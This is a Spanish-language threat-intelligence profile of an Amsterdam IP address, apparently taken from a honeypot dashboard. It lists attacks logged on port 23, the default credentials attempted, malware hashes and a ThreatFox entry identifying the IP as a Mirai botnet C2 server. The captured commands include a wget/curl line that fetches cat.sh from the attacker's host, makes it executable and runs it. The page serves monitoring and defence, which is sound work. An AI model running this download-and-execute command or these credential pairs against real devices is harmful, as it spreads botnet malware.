TROYANOSYVIRUS
Amenaza ActivaBAJO

82.26.74.181

Pais de Origen🇳🇱 Paises Bajos
Primera Deteccion17/2/2026
Ultima Actividad17/2/2026
ISPTube-Hosting
🎯
16
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
2
Malware

Geolocalizacion

Pais
🇳🇱 Paises Bajos
Ciudad
Amsterdam
ASN
AS213200
ISP
Tube-Hosting

Tipos de Ataque

cowrie

Puertos Atacados

23

Malware Asociado

f7c8a80b0194ed02f71b...fb51cc30f5ac43a9cc4e...

Credenciales Intentadas

🔐admin/admin
1x
🔐root/123456789
1x
🔐admin/admin1
1x

Comandos Ejecutados

$shell:cd /data/local/tmp1x
$shell:cd /data/local/tmp; rm -rf cat.sh; rm -rf iran.*; wget http://82.26.74.181/cat.sh || curl http://82.26.74.181/cat.sh -o cat.sh; chmod 777 cat.sh; ./cat.sh1x
$uname -m1x

ThreatFox Intelabuse.ch

⚠️SERVIDOR C2 CONOCIDO
Familias de Malware
win.mirai
Tipos de Amenaza
botnet_cc
Confianza: 100%

Evaluacion de Riesgo

25
/100
BajoMedioAltoCritico